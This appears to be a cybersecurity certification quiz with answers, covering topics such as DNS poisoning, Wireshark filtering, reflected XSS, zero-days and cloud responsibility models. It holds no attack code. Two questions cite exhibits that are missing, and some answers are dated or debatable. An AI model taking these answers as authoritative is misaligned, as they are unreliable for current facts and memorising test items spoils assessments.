After detecting a security incident that may have left your systems vulnerable to outside attack, you determine that a change is necessary. You want to reduce the impact of the threat as soon as possible, but you also want to follow your organization's change management procedures. Which of the following would be the BEST approach to this scenario?
Submit a high-priority change request and wait for the necessary approvals before making changes to the system.
Which of the following frame (packet) subtrees would you expand in order to view the POST data that was captured by Wireshark?
The HTML Form URL Encoded: subtree would have the POST data.
An attacker may poison the DNS by making changes to an organization's DNS table. Why might an attacker take this action?
The attacker can redirect users to a malicious website.
A Windows web server that was reported as being compromised has been scanned, patched, and appears to be running properly with no indications that it is still compromised. The server is back in production, but users are complaining that they receive certificate errors when connecting to it. You did not perform the quarantine on the machine (a coworker did). They also performed the patching and scanning before putting it back to work in production. What might be causing the certificate errors?
The server certificate was revoked since the private key may have been compromised.
While performing an audit of your company's network, you use Wireshark to sniff the network and then use the tcp contains password command to filter and see the results below. What might you conclude based on these findings?
There is a website that someone on your network logged into that has no encryption.
Kjell is a security analyst and needs to see if any sensitive information is available through old website snapshots. Which tool is BEST suited for this purpose?
Wayback Machine
Which of the following is the client responsible for in a PaaS cloud service model?
all applications developed
According to OWASP, what is the number one risk for mobile devices?
improper platform usage
What is the primary difference between reconnaissance and enumeration?
reconnaissance is passive discovery; enumeration is active discovery
Which of the following occurs during the deployment phase of the IT asset life cycle?
recording of asset tag information
Which of the following is an attack where injected script is immediately mirrored off a web server when a user inputs data in a form or search field?
reflected cross-site scripting
After having downloaded and installed pfblockerng for your pfsense firewall, you are configuring what sites to block. How do you block lists of websites you don't want the employees to access?
use lists found on the internet that are formatted for pfblockerng
Threats that do not have an existing fix, do not have any security fixes, and do not have available patches are called what?
zero-day threats
As you perform an audit of your company's DNS servers, you notice from an external third-party DNS source that the following information is visible. You know the servers listed are internal only and should not be visible in a domain query. What is it called when internal DNS server information is available outside of a company's network?
zone transfer